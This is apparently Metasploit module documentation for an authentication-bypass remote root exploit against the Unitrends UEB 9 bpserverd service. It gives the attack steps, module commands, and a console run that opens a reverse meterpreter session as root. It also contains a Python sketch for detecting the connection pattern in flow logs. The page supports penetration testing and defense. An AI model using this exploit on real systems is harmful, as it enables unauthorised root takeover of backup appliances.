
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md

Vulnerable Application

Unitrends UEB 9 bpserverd authentication bypass RCE

This exploit gains root command execution through roughly the same process that the apache user uses on the Unitrends appliance. The process is something like this:

  1. Connect to xinetd process (it's usually running on port 1743)

  2. This process will send something like: ?A,Connect36092

  3. Initiate a second connection to the port specified in the packet from xinetd (36092 in this example)

  4. Send a specially crafted packet to xinetd, containing the command to be executed as root

  5. Receive command output from the connection to port 36092

  6. Close both connections
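
The two-connection sequence in steps 1 to 3 leaves a recognisable trace in flow or firewall logs: a connection to port 1743 followed shortly by a second connection from the same source to another port on the appliance. The following detection sketch is an added example, not part of the module or its documentation; the flow-record layout, the 5-second window, the trusted-source list and the function names are assumptions, and the sample records are constructed.

```python
from collections import defaultdict

XINETD_PORT = 1743               # xinetd/bpserverd port named on this page
WINDOW_SECONDS = 5.0             # assumption: the second connection follows quickly
TRUSTED_SOURCES = {"127.0.0.1"}  # assumption: only the appliance itself is expected

# Constructed flow records: (epoch seconds, source IP, destination IP, destination port)
SAMPLE_FLOWS = [
    (100.0, "10.0.0.141", "10.0.0.230", 1743),
    (100.2, "10.0.0.141", "10.0.0.230", 45425),
    (101.0, "10.0.0.141", "10.0.0.230", 1743),
    (101.3, "10.0.0.141", "10.0.0.230", 40889),
    (150.0, "10.0.0.77", "10.0.0.230", 1743),   # lone connection, no follow-up
    (200.0, "10.0.0.88", "10.0.0.230", 443),    # unrelated traffic
    (300.0, "127.0.0.1", "10.0.0.230", 1743),
    (300.1, "127.0.0.1", "10.0.0.230", 36092),  # trusted local client
]


def find_bpserverd_handshakes(flows, window=WINDOW_SECONDS, trusted=TRUSTED_SOURCES):
    """Return {(src, dst): [(time, second_port), ...]} for untrusted sources that
    connect to XINETD_PORT and then to another port on the same host within window."""
    pending = {}              # (src, dst) -> time of the last unmatched 1743 connection
    hits = defaultdict(list)
    for ts, src, dst, dport in sorted(flows):
        if src in trusted:
            continue
        key = (src, dst)
        if dport == XINETD_PORT:
            pending[key] = ts
        elif key in pending:
            if ts - pending[key] <= window:
                hits[key].append((ts, dport))
            del pending[key]  # one control connection pairs with one follow-up
    return dict(hits)


def alerts(flows, min_pairs=1):
    """Format one alert line per source/destination pair with enough handshakes."""
    return [
        f"{src} -> {dst}: {len(pairs)} bpserverd handshake(s), data ports {[p for _, p in pairs]}"
        for (src, dst), pairs in sorted(find_bpserverd_handshakes(flows).items())
        if len(pairs) >= min_pairs
    ]


if __name__ == "__main__":
    for line in alerts(SAMPLE_FLOWS):
        print(line)
```

Several pairs from one source in quick succession match the repeated connections visible in the scenario output below, so raising `min_pairs` reduces noise from single stray connections.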

Verification Steps

  1. use exploit/linux/misc/ueb9_bpserverd

  2. set lhost [IP]

  3. set rhost [IP]

  4. exploit

  5. A meterpreter session should have been opened successfully

Scenarios

UEB 9.1 on CentOS 6.5

msf > use exploit/linux/misc/ueb9_bpserverd
msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_bpserverd) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9....
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 45425
[*] 10.0.0.230:1743 - Connecting to 45425
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 26.71% done (199/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 40889
[*] 10.0.0.230:1743 - Connecting to 40889
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 53.56% done (399/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 40016
[*] 10.0.0.230:1743 - Connecting to 40016
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 80.27% done (598/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 53649
[*] 10.0.0.230:1743 - Connecting to 53649
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400
[*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >